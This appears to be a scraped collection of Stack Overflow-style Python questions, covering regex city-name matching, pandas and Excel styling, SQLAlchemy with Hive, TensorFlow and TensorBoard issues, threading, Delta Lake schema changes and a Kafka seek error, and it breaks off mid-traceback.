<p>In a Python regex, I am trying to compare identical city names that are formatted differently (uppercase/lowercase, separated by spaces or hyphens, characters with different cases). For example, "Paris" and "paris", "New York" and "neW-york" should match, but not "Paris" and "New York".</p>
<p>my code :</p>
<pre><code>import re
import unicodedata
class CompareCities:
def __init__(self):
self.city_regex = re.compile(
r"^(([A-Z]+[a-z]*)|([a-z]+[A-Z]*))[ -]?(([A-Z]+[a-z]*)|([a-z]+[A-Z]*))$"
)
def compare(self, city1, city2):
city1_normalized = self._normalize(city1)
city2_normalized = self._normalize(city2)
return city1_normalized == city2_normalized
def _normalize(self, city):
city = (
self.city_regex.match(city).group()
if self.city_regex.match(city)
else False
)
if not city:
return False
city = (
unicodedata.normalize("NFD", city)
.encode("ascii", "ignore")
.decode("utf-8")
.upper()
)
return city
compare_cities = CompareCities()
result = compare_cities.compare("New York", "nEw-yOrk")
if result:
print("same city")
else:
print("not same city")
</code></pre>
<p>The problem: for example, "New York" and "nEw-yOrk" should match, but they don't.</p>
<p>Thank you for your help.</p>
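<p>One issue with the regex approach above is that it validates the shape of a name but never unifies the separators, so <code>"New York"</code> and <code>"nEw-yOrk"</code> normalize to different strings. A simpler sketch that strips accents, collapses any run of spaces/hyphens into a single separator, and compares case-insensitively:</p>

```python
import re
import unicodedata


def normalize_city(city: str) -> str:
    # Strip accents, then treat any run of spaces/hyphens as one separator
    # and compare case-insensitively.
    city = unicodedata.normalize("NFD", city).encode("ascii", "ignore").decode()
    return re.sub(r"[\s-]+", " ", city).strip().upper()


def same_city(a: str, b: str) -> bool:
    return normalize_city(a) == normalize_city(b)


print(same_city("New York", "nEw-yOrk"))  # True
print(same_city("Paris", "New York"))     # False
```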
|
<python><string><compare>
|
2023-05-22 09:36:07
| 3
| 381
|
Zembla
|
76,304,798
| 7,214,344
|
Finding nearest neighbor pixel from a binary mask
|
<p>I have a matrix and a binary mask. For example:
Matrix is</p>
<pre><code>array([[ 1, 2, 3, 4],
[ 5, 6, 7, 8],
[ 9, 10, 11, 12],
[13, 14, 15, 16]])
</code></pre>
<p>And binary mask is</p>
<pre><code>array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1]])
</code></pre>
<p>I want to create a new matrix that has original matrix's entries in places where the binary mask is 0, and in nonzero places it should choose the closest element from the zero region. So the required output matrix in the example above is:</p>
<pre><code>array([[10, 10, 11, 11],
[10, 10, 11, 11],
[10, 10, 11, 11],
[14, 14, 15, 15]]).
</code></pre>
<p>Using opencv, I can obtain a matrix of distances for the binary matrix, via the command:</p>
<pre><code>cv2.distanceTransformWithLabels(binary.astype('uint8'),cv2.DIST_L2 ,cv2.DIST_MASK_PRECISE)
</code></pre>
<p>The output of the command is</p>
<pre><code>(array([[2.1968994, 2. , 2. , 2.1968994],
[1.3999939, 1. , 1. , 1.3999939],
[1. , 0. , 0. , 1. ],
[1. , 0. , 0. , 1. ]], dtype=float32),
array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]], dtype=int32))
</code></pre>
<p>However, it does not return the indices of the closest element, only the distances to it (as can be seen in the example above). Any idea how to achieve the desired output using <code>opencv</code> or any other Python package?</p>
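<p>SciPy's distance transform can return the coordinates of the nearest zero directly via <code>return_indices=True</code>, which makes this a two-liner. A sketch with the example data:</p>

```python
import numpy as np
from scipy import ndimage

matrix = np.array([[1, 2, 3, 4],
                   [5, 6, 7, 8],
                   [9, 10, 11, 12],
                   [13, 14, 15, 16]])
mask = np.array([[1, 1, 1, 1],
                 [1, 1, 1, 1],
                 [1, 0, 0, 1],
                 [1, 0, 0, 1]])

# For every pixel, (rows, cols) holds the coordinates of the nearest
# zero in the mask (Euclidean distance, ties broken deterministically).
_, (rows, cols) = ndimage.distance_transform_edt(mask, return_indices=True)
result = matrix[rows, cols]
print(result)  # matches the desired output above
```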
|
<python><opencv><breadth-first-search><flood-fill>
|
2023-05-22 09:34:42
| 0
| 19,734
|
Miriam Farber
|
76,304,767
| 4,266,314
|
How to retrieve a Hive query as a DataFrame?
|
<p>I want to connect to a Hive database via ODBC using <code>sqlalchemy</code>. I managed to connect and query using <code>pyodbc</code> instead of <code>sqlalchemy</code>. Here is what I've done:</p>
<pre class="lang-py prettyprint-override"><code>import pyodbc
import pandas as pd
cnxn = pyodbc.connect("DSN=my_dsn", autocommit=True)
pd.read_sql("SELECT * FROM database.table LIMIT 10", cnxn)
</code></pre>
<p>This works in principle, but I get this warning:</p>
<blockquote>
<p>UserWarning: pandas only support SQLAlchemy connectable (engine/connection) or database string URI or sqlite3 DBAPI2 connection. Other DBAPI2 objects are not tested, please consider using SQLAlchemy</p>
</blockquote>
<p>Thus, I want to switch to <code>sqlalchemy</code>, but the following does not work:</p>
<pre class="lang-py prettyprint-override"><code>from sqlalchemy import create_engine
engine = create_engine(
"mssql+pyodbc://my_dsn",
connect_args={"autocommit": True}
)
pd.read_sql("SELECT * FROM database.table LIMIT 10", engine)
</code></pre>
<blockquote>
<p>AttributeError: 'OptionEngine' object has no attribute 'execute'</p>
</blockquote>
<p>Next attempt:</p>
<pre class="lang-py prettyprint-override"><code>engine.connect()
</code></pre>
<p>Next error:</p>
<blockquote>
<p>Syntax or semantic analysis error thrown in server while executing query. Error message from server: AnalysisException: default.schema_name() unknown for database default. Currently this db has 0 functions.</p>
</blockquote>
<p><strong>How can I connect to my database using <code>sqlalchemy</code>?</strong></p>
<p>Or is there some other easy way to make queries and get the result in form of a DataFrame?</p>
<p><strong>EDIT:</strong>
I'm using Python 3.9.11, sqlalchemy 2.0.12, and pandas 1.4.2.</p>
|
<python><pandas><sqlalchemy><hive><pyodbc>
|
2023-05-22 09:30:46
| 1
| 1,958
|
der_grund
|
76,304,601
| 17,638,206
|
Importing a module from a different path in the same project
|
<p>I have the following project structure :</p>
<pre><code>-project
-src
-package1
-script1.py
-__init__.py
-package2
-script2.py
- __init__.py
-__init__.py
</code></pre>
<p>Now <code>script1.py</code> includes two functions :</p>
<pre><code>def funct1():
    print("Hello")

def funct2():
    pass  # do something
</code></pre>
<p>Now I want to run <code>funct1()</code> in <code>script2.py</code>. I am new to this, as I have always written all my code in <code>main.py</code>.
I searched for this problem and wrote the following code in <code>script2.py</code>:</p>
<pre><code>from src.package1.script1 import *
funct1()
</code></pre>
<p>This gives me the following error :</p>
<pre><code> from src.package1.script1 import *
ModuleNotFoundError: No module named 'src'
</code></pre>
<p>Could somebody help me import the function? I also have another question: once the import error is solved, do I call <code>funct1()</code> directly in <code>script2.py</code>, or do I need something extra, like a main function in <code>script2.py</code>?</p>
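<p>The import fails because running <code>python script2.py</code> puts <code>package2/</code> on <code>sys.path</code>, not the project root that contains <code>src/</code>. Running <code>python -m src.package2.script2</code> from the project root fixes that; making the root importable by hand works too. A self-contained sketch that rebuilds the layout in a temp folder to demonstrate the second option (once imported, <code>funct1()</code> is called directly — no main function is required):</p>

```python
import importlib
import os
import sys
import tempfile

# Recreate the question's layout in a temporary folder, then make the
# *project root* (the folder containing src/) importable — which is what
# running `python -m src.package2.script2` from the root does for you.
root = tempfile.mkdtemp()
pkg1 = os.path.join(root, "src", "package1")
os.makedirs(pkg1)
for d in (os.path.join(root, "src"), pkg1):
    open(os.path.join(d, "__init__.py"), "w").close()
with open(os.path.join(pkg1, "script1.py"), "w") as f:
    f.write("def funct1():\n    return 'Hello'\n")

sys.path.insert(0, root)
script1 = importlib.import_module("src.package1.script1")
print(script1.funct1())  # Hello
```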
|
<python><python-3.x>
|
2023-05-22 09:10:20
| 1
| 375
|
AAA
|
76,304,449
| 1,497,720
|
TFAutoModelForSeq2SeqLM requires the TensorFlow library but it was not found in your environment
|
<p>For code below:</p>
<pre><code>from transformers import TFAutoModelForSeq2SeqLM, AutoTokenizer
from transformers import pipeline
# Load the pre-trained T5 model and tokenizer
model_checkpoint = "t5-small"
model = TFAutoModelForSeq2SeqLM.from_pretrained(model_checkpoint)
tokenizer = AutoTokenizer.from_pretrained(model_checkpoint)
# Define the summarization function
summarizer = pipeline("summarization", model=model, tokenizer=tokenizer, framework="tf")
summarizer(
"how are you today? this is something remarkable, the sun is from the west",
min_length=1,
max_length=19,
)
</code></pre>
<p>I got the following error:</p>
<pre><code>---------------------------------------------------------------------------
ImportError Traceback (most recent call last)
~\AppData\Local\Temp/ipykernel_37988/4253040799.py in <module>
3 # Load the pre-trained T5 model and tokenizer
4 model_checkpoint = "t5-small"
----> 5 model = TFAutoModelForSeq2SeqLM.from_pretrained(model_checkpoint)
6 tokenizer = AutoTokenizer.from_pretrained(model_checkpoint)
7
C:\ProgramData\Anaconda3\lib\site-packages\transformers\utils\dummy_tf_objects.py in from_pretrained(cls, *args, **kwargs)
262 @classmethod
263 def from_pretrained(cls, *args, **kwargs):
--> 264 requires_backends(cls, ["tf"])
265
266
C:\ProgramData\Anaconda3\lib\site-packages\transformers\file_utils.py in requires_backends(obj, backends)
681 name = obj.__name__ if hasattr(obj, "__name__") else obj.__class__.__name__
682 if not all(BACKENDS_MAPPING[backend][0]() for backend in backends):
--> 683 raise ImportError("".join([BACKENDS_MAPPING[backend][1].format(name) for backend in backends]))
684
685
ImportError:
TFAutoModelForSeq2SeqLM requires the TensorFlow library but it was not found in your environment. Checkout the instructions on the
installation page: https://www.tensorflow.org/install and follow the ones that match your environment.
</code></pre>
<p>How should I solve it?</p>
<p>The result of <code>pip list</code> shows that I have tensorflow 2.12.0 installed:</p>
<pre><code>tensorflow 2.12.0
</code></pre>
<p>I have seen <a href="https://stackoverflow.com/questions/70624869/tfbertforsequenceclassification-requires-the-tensorflow-library-but-it-was-not-f">TFBertForSequenceClassification requires the TensorFlow library but it was not found in your environment</a>, but neither solution there helped.</p>
<p>Update for Alvas:
<a href="https://i.sstatic.net/VFw6F.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/VFw6F.png" alt="enter image description here" /></a></p>
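<p>A hedged diagnostic: this <code>ImportError</code> means transformers could not import TensorFlow in the interpreter actually running the code — typically the notebook kernel is a different environment from the one <code>pip install tensorflow</code> ran in (the traceback's <code>C:\ProgramData\Anaconda3</code> paths hint at that). A quick check from the same notebook:</p>

```python
import sys

print(sys.executable)  # which interpreter the notebook actually uses
try:
    import tensorflow as tf
    print("TensorFlow", tf.__version__, "is importable here")
except ImportError as err:
    print("TensorFlow is NOT importable in this environment:", err)
```

<p>If the second branch fires, install TensorFlow with that exact interpreter (<code>%pip install tensorflow</code> inside the notebook) or switch the kernel to the environment that has it.</p>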
|
<python><python-3.x><tensorflow><huggingface-transformers><transformer-model>
|
2023-05-22 08:49:55
| 1
| 18,765
|
william007
|
76,304,401
| 12,435,792
|
Convert to pd.to_timedelta(unit='m') not working
|
<pre><code>df.loc[i,'time in queue']=datetime.datetime.now()-df.loc[i,'IST DateTime']
actual_time_left=float(sla_dict.get( df.loc[i,'SLA Type'])-df.loc[i,'time in queue'].total_seconds()/60)
df.loc[i,'actual time left']=pd.to_timedelta(actual_time_left,unit='m')
</code></pre>
<p>where,</p>
<pre><code>df.loc[i,'IST DateTime'] = Timestamp('2023-05-22 08:14:00')
sla_dict.get( df.loc[i,'SLA Type']) = 120
actual_time_left = -221.71050316666668
df.loc[i,'actual time left']=Timedelta('-1 days +20:18:17.369809980')
</code></pre>
<p>The IST time was 8:14 AM and the SLA was 120 minutes, i.e. this task was supposed to be completed within 120 minutes. The IST time right now is 2:09 PM, so this PNR has missed its SLA by roughly 240 minutes.
I want to display the actual time left as <code>-04:00:00</code> (i.e. it is past its SLA by about 4 hours).
How can I do that?</p>
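<p>The <code>-1 days +20:18:17</code> form is just how pandas reprs a negative <code>Timedelta</code>; for a <code>-HH:MM:SS</code> display you can format it yourself. A sketch of a small helper:</p>

```python
import pandas as pd


def fmt_timedelta(td: pd.Timedelta) -> str:
    # Render as [-]HH:MM:SS instead of pandas' '-1 days +20:18:17' style.
    sign = "-" if td < pd.Timedelta(0) else ""
    secs = int(abs(td).total_seconds())
    h, rem = divmod(secs, 3600)
    m, s = divmod(rem, 60)
    return f"{sign}{h:02d}:{m:02d}:{s:02d}"


print(fmt_timedelta(pd.Timedelta(minutes=-221.71050316666668)))  # -03:41:42
```

<p>Applied to the dataframe, <code>df['actual time left'].map(fmt_timedelta)</code> would give a display column in that format.</p>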
|
<python><pandas><datetime>
|
2023-05-22 08:40:55
| 0
| 331
|
Soumya Pandey
|
76,304,343
| 16,933,406
|
dataframe to excel with styling (background and color)
|
<p>I have a data frame as below and want to apply two styling conditions and save the result to Excel.</p>
<p>I can apply either condition on its own, but not both simultaneously.</p>
<blockquote>
<p><strong>input:</strong> dataframe (2 colums) and a given_list(index numbers)</p>
<p><strong>condition_1:</strong> [highlight ('background-color: yellow') and red color
('color:red') but if type(column[0])!=int then blue color
('color:blue')] if row.numer in the given_list.</p>
<p><strong>condition_2:</strong> if type(column[0])!=int then blue color ('color:blue')</p>
</blockquote>
<p><strong>data_frame</strong>={
'column0': {0: 1, 1: 2, 2: 3, 3: 4, 4: 5, 5: 6, 6: 7, 7: 8, 8: 9, <strong>9: 10A, 10: 11B, 11: 12C</strong>, 12: 13, 13: 14, 14: 15, 15: 16, 16: 17, 17: 18, <strong>18: 19A, 19: 20B,</strong> 20: 21, 21: 22, 22: 23, 23: 24, 24: 25, 25: 26, 26: 27},
'column1': {0: 'A', 1: 'V', 2: 'T', 3: 'L', 4: 'G', 5: 'E', 6: 'S', 7: 'G', 8: 'G', 9: 'G', 10: 'L', 11: 'Q', 12: 'T', 13: 'P', 14: 'G', 15: 'G', 16: 'G', 17: 'L', 18: 'S', 19: 'L', 20: 'V', 21: 'C', 22: 'K', 23: 'A', 24: 'S', 25: 'G', 26: 'F'}
}</p>
<p><strong>given_list</strong>=[7,8,9,10,11,12,13,14,15,21,22] ### the index numbers of the dataframe</p>
<p><strong>desired_output</strong>:<a href="https://i.sstatic.net/9xxwW.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/9xxwW.png" alt="enter image description here" /></a></p>
<p>What I tried:</p>
<pre><code>def highlight(row, row_index):
    background_color = 'background-color: yellow'
    text_color = 'color:red'
    text_color_1 = 'color:blue'
    highlighted_rows = [f'{text_color}; {background_color}' if row.name in row_index
                        else (f'{text_color_1}' if not isinstance(row[0], int) else '')
                        for _, cell in enumerate(row)]
    return highlighted_rows

highlighted_df = df.style.apply(lambda row: highlight(row, row_index), axis=1)
aligned_df = highlighted_df.set_properties(**{'text-align': 'center'})
aligned_df.to_excel('highlighted_dataframe.xlsx', engine='openpyxl', index=False)
</code></pre>
<p><strong>output</strong>=<a href="https://i.sstatic.net/Kd4LQ.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Kd4LQ.png" alt="enter image description here" /></a></p>
<p>I am not able to color the text based on both conditions. How can I apply both conditions simultaneously to get the desired output?
Any help will be appreciated.</p>
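<p>One way to think about combining the two conditions is to express the style for a single row in a plain function first, before wiring it into <code>df.style.apply</code>. A stdlib-only sketch of that per-row logic (the helper name and signature are mine, not from the original attempt):</p>
<pre><code>```python
def style_for_row(values, row_name, given_list):
    # condition 1: rows in given_list get a yellow background; text is red,
    #   unless the first cell is not an int, in which case it is blue
    # condition 2: other rows only get blue text when the first cell isn't an int
    text = "color:red" if isinstance(values[0], int) else "color:blue"
    if row_name in given_list:
        style = f"{text}; background-color: yellow"
    else:
        style = "" if isinstance(values[0], int) else "color:blue"
    return [style] * len(values)

print(style_for_row([8, "G"], 7, [7, 8, 9]))      # highlighted, red text
print(style_for_row(["10A", "G"], 9, [7, 8, 9]))  # highlighted, blue text
print(style_for_row(["19A", "S"], 18, [7, 8, 9])) # blue text only
print(style_for_row([21, "V"], 20, [7, 8, 9]))    # no styling
```</code></pre>
<p>This can then be applied per row with something like <code>df.style.apply(lambda row: style_for_row(list(row), row.name, given_list), axis=1)</code>.</p>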
|
<python><pandas><dataframe><pyexcel>
|
2023-05-22 08:32:30
| 3
| 617
|
shivam
|
76,304,330
| 6,220,759
|
Splitting on a character which should always be at the beginning of a group
|
<p>I would like to split a string based on the following rules:</p>
<ul>
<li>if it contains 0 bullets (•), return the whole string</li>
<li>if it contains 1 or more bullets, return the string up until the bullet, and then a new group starting with each bullet.</li>
</ul>
<p>Example:</p>
<pre><code>"Python is: • Great language • Better than Java • From 1991"
</code></pre>
<p>Should return 4 groups:</p>
<pre><code>["Python is: ", "• Great language ", "• Better than Java ", "• From 1991"]
</code></pre>
<p>I tried using this regex:</p>
<pre><code>re.split('[^•](.+?)[•$]')
</code></pre>
<p>But since the bullet is a boundary, if it finds one match ending in a bullet, it doesn't see the next string as beginning in one.</p>
<p>How can I solve this?</p>
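<p>One hedged sketch: instead of consuming the bullet as a boundary, split on a zero-width lookahead so the bullet stays attached to the start of each group (Python 3.7+ allows splitting on zero-width patterns):</p>
<pre><code>```python
import re

s = "Python is: • Great language • Better than Java • From 1991"
# split *before* each bullet without consuming any characters
groups = re.split(r"(?=•)", s)
print(groups)
# ['Python is: ', '• Great language ', '• Better than Java ', '• From 1991']
```</code></pre>
<p>A string with no bullets simply comes back as a one-element list, which matches the first rule above.</p>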
|
<python><regex>
|
2023-05-22 08:31:18
| 0
| 11,757
|
Josh Friedlander
|
76,304,244
| 10,970,202
|
Tensorboard profiler tab not showing anything behind corporate firewall
|
<p>Versions: python3.7, tensorflow 2.9.1, tensorboard 2.9.1, tensorboard-plugin-profile==2.11.2.</p>
<p>tb_callback is passed in as follows</p>
<pre><code>tb_callback = tf.keras.callbacks.TensorBoard(logdir=path_tologdir, histogram_freq=1, profile_batch=(1,5))
model.fit(train_ds, validation_data=valid_ds, callbacks=[tb_callback], epochs=10, verbose=2, use_multiprocessing=True, workers=2)
</code></pre>
<p>This successfully writes .pb files to <code>path_to_logdir/plugins/profile/datetime/{pb files}</code>,
and when opening the <code>overview_page.pb</code> files in Notepad I can see profiling messages such as <br>
"your program is POTENTIALLY input-bound because n% of the total step time sampled is spent on 'All Others' ..." <br></p>
<p>I therefore assume that TensorFlow profiles the process successfully, but TensorBoard is unable to read the results.</p>
<p>TensorBoard is run as follows:</p>
<pre><code>tensorboard --logdir path_to_logdir/ --bind_all
</code></pre>
<p>and I access it from a different server. NOTE: model training and TensorBoard run on the same server.</p>
<p>I can see on top right dropdown "profiler" however upon clicking it shows blank page and prints following logs in server that tensorboard is running in:</p>
<pre><code>Illegal Content-Security-Policy for script-src: 'unsafe-inline'
Illegal Content-Security-Policy for script-src-elem: 'unsafe-inline'
</code></pre>
<p>from <a href="https://github.com/tensorflow/profiler" rel="nofollow noreferrer">https://github.com/tensorflow/profiler</a> it says <code>Note: The TensorFlow Profiler requires access to the Internet to load the Google Chart library. Some charts and tables may be missing if you run TensorBoard entirely offline on your local machine, behind a corporate firewall, or in a datacenter.</code></p>
<p>Is a blank page expected? I expected only a few charts to be missing, not all of them, given that I'm running this behind a corporate firewall.</p>
<p>I've been searching about this for a while; there is also <a href="https://discuss.tensorflow.org/t/how-do-i-setup-tensorboard-profiler-for-training-as-currently-is-not-working-and-not-showing-profiling-tab/7134" rel="nofollow noreferrer">https://discuss.tensorflow.org/t/how-do-i-setup-tensorboard-profiler-for-training-as-currently-is-not-working-and-not-showing-profiling-tab/7134</a> on the TensorFlow forum, however there do not seem to be any answers there.</p>
<p>Things I've tried:</p>
<ul>
<li>Profiling with <code>tf.profiler.experimental.start(log_path)</code> and <code>tf.profiler.experimental.stop()</code> -> same problem</li>
</ul>
|
<python><tensorflow><deep-learning><tensorboard>
|
2023-05-22 08:18:09
| 0
| 5,008
|
haneulkim
|
76,304,096
| 6,330,106
|
Thread.join() differences between Python2.7 and Python3.x
|
<p>In a tutorial on threading.Lock, it gives an example of two threads writing the same global variable without any lock. The tutorial doesn't specify which version of Python it uses.</p>
<pre><code>import threading
num = 0
def add():
global num
for i in range(1000000):
num += 1
def desc():
global num
for i in range(1000000):
num -= 1
def main():
t1 = threading.Thread(target=add)
t2 = threading.Thread(target=desc)
t1.start()
t2.start()
t1.join()
t2.join()
print(num)
main()
</code></pre>
<p>Running the code multiple times is expected to give different results each time, demonstrating that it goes wrong without a lock in this case. Under Python 2.7, the results indeed differ between runs. However, with Python 3.x (I use Python 3.10), the result is always 0.</p>
<p>As t1 and t2 are joined, the main thread is blocked until <code>add</code> and <code>desc</code> are finished. To my understanding, <code>num += 1</code> and <code>num -= 1</code> are atomic operations. I think that, no matter how the two threads interleave, both <code>num += 1</code> and <code>num -= 1</code> are executed 1000000 times before <code>print(num)</code>, so <code>num</code> should always be 0 at the end, and I don't think a Lock instance is necessary in this case. However, the Python 2.7 results show that this is not true.</p>
<p>We have a lot of scripts that run under either Python 2.7 or Python 3.x, so I'd like to figure out why it behaves differently. Thanks for any help.</p>
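<p>As a side note on the atomicity assumption: the bytecode can be inspected with the stdlib <code>dis</code> module. <code>num += 1</code> compiles to separate load, add, and store instructions, so a thread can in principle be preempted between them (the exact opcode names vary by Python version):</p>
<pre><code>```python
import dis

num = 0

def add():
    global num
    num += 1

ops = [ins.opname for ins in dis.get_instructions(add)]
# e.g. ['LOAD_GLOBAL', 'LOAD_CONST', 'INPLACE_ADD', 'STORE_GLOBAL', ...] on 3.8-3.10;
# newer versions use BINARY_OP instead of INPLACE_ADD
print(ops)
```</code></pre>
<p>That the increment is several instructions is what makes it unsafe without a lock in principle; why a particular interpreter version happens to never interleave them in practice is a separate scheduling question.</p>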
|
<python><python-multithreading><python-3.10>
|
2023-05-22 07:59:11
| 0
| 31,575
|
ElpieKay
|
76,303,957
| 9,962,007
|
“Launch Classic Notebook” option is gone from the JupyterLab Help menu
|
<p>The deprecation of Notebook in favor of Lab is ongoing, and since JupyterLab 4.0.0 the dependency on Notebook (and with it the useful backward-compatibility option “Launch Classic Notebook”) has been removed from the JupyterLab Help menu. Any workarounds?</p>
|
<python><jupyter-notebook><jupyter><jupyter-lab>
|
2023-05-22 07:40:35
| 1
| 7,211
|
mirekphd
|
76,303,713
| 2,000,548
|
How to add a new column when writing to a Delta table?
|
<p>I am using <a href="https://github.com/delta-io/delta-rs" rel="nofollow noreferrer">delta-rs</a> to write to a Delta table in the Delta Lake. Here is my code:</p>
<pre class="lang-py prettyprint-override"><code>import time
import numpy as np
import pandas as pd
import pyarrow as pa
from deltalake.writer import write_deltalake
num_rows = 10
timestamp = np.array([time.time() + i * 0.01 for i in range(num_rows)])
current = np.random.rand(num_rows) * 10
voltage = np.random.rand(num_rows) * 100
temperature = np.random.rand(num_rows) * 50
data = {
"timestamp": timestamp,
"current": current,
"voltage": voltage,
"temperature": temperature,
}
df = pd.DataFrame(data)
storage_options = {
"AWS_DEFAULT_REGION": "us-west-2",
"AWS_ACCESS_KEY_ID": "xxx",
"AWS_SECRET_ACCESS_KEY": "xxx",
"AWS_S3_ALLOW_UNSAFE_RENAME": "true",
}
schema = pa.schema(
[
("timestamp", pa.float64()),
("current", pa.float64()),
("voltage", pa.float64()),
("temperature", pa.float64()),
]
)
write_deltalake(
"s3a://my-bucket/delta-tables/motor",
df,
mode="append",
schema=schema,
storage_options=storage_options,
)
</code></pre>
<p>Above code successfully wrote the data including 4 columns to a Delta table. I can confirm by Spark SQL:</p>
<pre class="lang-bash prettyprint-override"><code>spark-sql> describe table delta.`s3a://my-bucket/delta-tables/motor`;
23/05/22 06:38:51 WARN ObjectStore: Failed to get database delta, returning NoSuchObjectException
timestamp double
current double
voltage double
temperature double
# Partitioning
Not partitioned
Time taken: 0.39 seconds, Fetched 7 row(s)
spark-sql> select * from delta . `s3a://my-bucket/delta-tables/motor` limit 10;
23/05/22 07:01:50 WARN ObjectStore: Failed to get database delta, returning NoSuchObjectException
1.683746477029865E9 7.604250297497938 9.421758439102415 72.1927369069416
1.683746477039865E9 0.09092487512480374 17.989035574705202 35.350210012093214
1.683746477049866E9 7.493128659573002 9.390891728445448 48.541259705334625
1.683746477059866E9 2.717780962917138 0.9268887657049119 59.10566692023579
1.683746477069866E9 2.57300442470119 17.486083607683693 47.23521355609355
1.683746477079866E9 2.09432242350117 14.945888123248054 47.125030870747715
1.683746477089866E9 4.136491853926207 16.52334128991138 27.544656909406505
1.6837464770998669E9 1.1299759566741152 5.539831633892187 52.50892511866684
1.6837464771098669E9 0.9626607062002979 8.400536671329352 72.49131313291358
1.6837464771198668E9 7.6866231204656446 4.033915109232906 48.900631068812075
Time taken: 5.925 seconds, Fetched 10 row(s)
</code></pre>
<p>Now I am trying to write to the Delta table with a new column <code>pressure</code>:</p>
<pre class="lang-py prettyprint-override"><code>import time
import numpy as np
import pandas as pd
import pyarrow as pa
from deltalake.writer import write_deltalake
num_rows = 10
timestamp = np.array([time.time() + i * 0.01 for i in range(num_rows)])
current = np.random.rand(num_rows) * 10
voltage = np.random.rand(num_rows) * 100
temperature = np.random.rand(num_rows) * 50
pressure = np.random.rand(num_rows) * 1000
data = {
"timestamp": timestamp,
"current": current,
"voltage": voltage,
"temperature": temperature,
"pressure": pressure,
}
df = pd.DataFrame(data)
storage_options = {
"AWS_DEFAULT_REGION": "us-west-2",
"AWS_ACCESS_KEY_ID": "xxx",
"AWS_SECRET_ACCESS_KEY": "xxx",
"AWS_S3_ALLOW_UNSAFE_RENAME": "true",
}
schema = pa.schema(
[
("timestamp", pa.float64()),
("current", pa.float64()),
("voltage", pa.float64()),
("temperature", pa.float64()),
("pressure", pa.float64()), # <- I added this line
]
)
write_deltalake(
"s3a://my-bucket/delta-tables/motor",
df,
mode="append",
schema=schema,
storage_options=storage_options,
overwrite_schema=True, # <- Whether add this or not will return same error
)
</code></pre>
<p>Note that adding <code>overwrite_schema=True</code> to <code>write_deltalake</code> does not affect the result.</p>
<p>It will throw this error:</p>
<pre class="lang-bash prettyprint-override"><code>...
Traceback (most recent call last):
File "python3.11/site-packages/deltalake/writer.py", line 180, in write_deltalake
raise ValueError(
ValueError: Schema of data does not match table schema
Table schema:
timestamp: double
current: double
voltage: double
temperature: double
pressure: double
Data Schema:
timestamp: double
current: double
voltage: double
temperature: double
</code></pre>
<p>This error confused me, because my existing Delta table schema should have 4 columns and the new data I want to write has 5 columns, but according to the error message it is the opposite.</p>
<p>How can I add a new column in a Delta table? Thanks!</p>
|
<python><apache-spark><delta-lake><data-lakehouse><delta-rs>
|
2023-05-22 07:04:26
| 2
| 50,638
|
Hongbo Miao
|
76,303,698
| 1,631,414
|
How do I move to a specific offset in a Kafka consumer without running into a ValueError?
|
<p>I'm using Python 3.9.16 and kafka-python version 2.0.2 on my MacBook Pro running macOS 11.6.5.</p>
<p>New to Kafka and just playing around with it for now. I'm not sure what the issue is and I'm not sure why my workaround works.</p>
<p>What I'm trying to do is seek to a specific offset on the topic but I routinely run into a ValueError.</p>
<p>This is the code I have.</p>
<pre><code>from kafka import KafkaConsumer, TopicPartition
consumer = KafkaConsumer(bootstrap_servers=['localhost:9092'])
#import pdb
#pdb.set_trace()
myTP = TopicPartition('my-topic', 0)
consumer.assign([myTP])
print ("this is the consumer assignment: {}".format(consumer.assignment()))
#print ("not sure why this will work but printing position: {} ".format(consumer.position(myTP)))
consumer.seek(myTP, 22)
#print ("not sure why this will work but printing position: {} ".format(consumer.position(myTP)))
for blah in consumer:
print ("{}, {}".format(blah.offset, blah.value))
</code></pre>
<p>So most of the time when I run it, I'll get this ValueError. Once in a while it will mysteriously work without my workaround but I don't know why.</p>
<pre><code>this is the consumer assignment: {TopicPartition(topic='my-topic', partition=0)}
Traceback (most recent call last):
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/types.py", line 20, in _unpack
(value,) = f(data)
struct.error: unpack requires a buffer of 4 bytes
...
...
...
ValueError: Error encountered when attempting to convert value: b'' to struct format: '<built-in method unpack of _struct.Struct object at 0x10539a930>', hit error: unpack requires a buffer of 4 bytes
</code></pre>
<p>The workaround I found: if I print the position before and after my seek command, it seems to work every time, but I don't know why. Can someone explain this to me? Do I need to build in a short delay to make this work? Does printing my position reset something within the Consumer that makes it work?</p>
<pre><code>$ python tkCons.py
this is the consumer assignment: {TopicPartition(topic='my-topic', partition=0)}
not sure why this will work but printing position: 34
not sure why this will work but printing position: 22
22, b'{"number": 8}'
23, b'{"number": 9}'
24, b'{"number": 0}'
25, b'{"number": 1}'
26, b'{"number": 2}'
27, b'{"number": 3}'
28, b'{"number": 4}'
29, b'{"number": 5}'
30, b'{"number": 6}'
31, b'{"number": 7}'
32, b'{"number": 8}'
33, b'{"number": 9}'
</code></pre>
<p>EDIT:
Full traceback is here:</p>
<pre><code>$ python tkCons.py
this is the consumer assignment: {TopicPartition(topic='my-topic', partition=0)}
Traceback (most recent call last):
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/protocol/types.py", line 20, in _unpack
(value,) = f(data)
struct.error: unpack requires a buffer of 4 bytes
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/my_secret_username/kafka/tkCons.py", line 34, in <module>
for blah in consumer:
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 1193, in __next__
return self.next_v2()
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 1201, in next_v2
return next(self._iterator)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 1116, in _message_generator_v2
record_map = self.poll(timeout_ms=timeout_ms, update_offsets=False)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 655, in poll
records = self._poll_once(remaining, max_records, update_offsets=update_offsets)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/consumer/group.py", line 702, in _poll_once
self._client.poll(timeout_ms=timeout_ms)
File "/Users/my_secret_username/venvs/kafka/lib/python3.9/site-packages/kafka/client_async.py", line 602, in poll
self._poll(timeout / 1000)
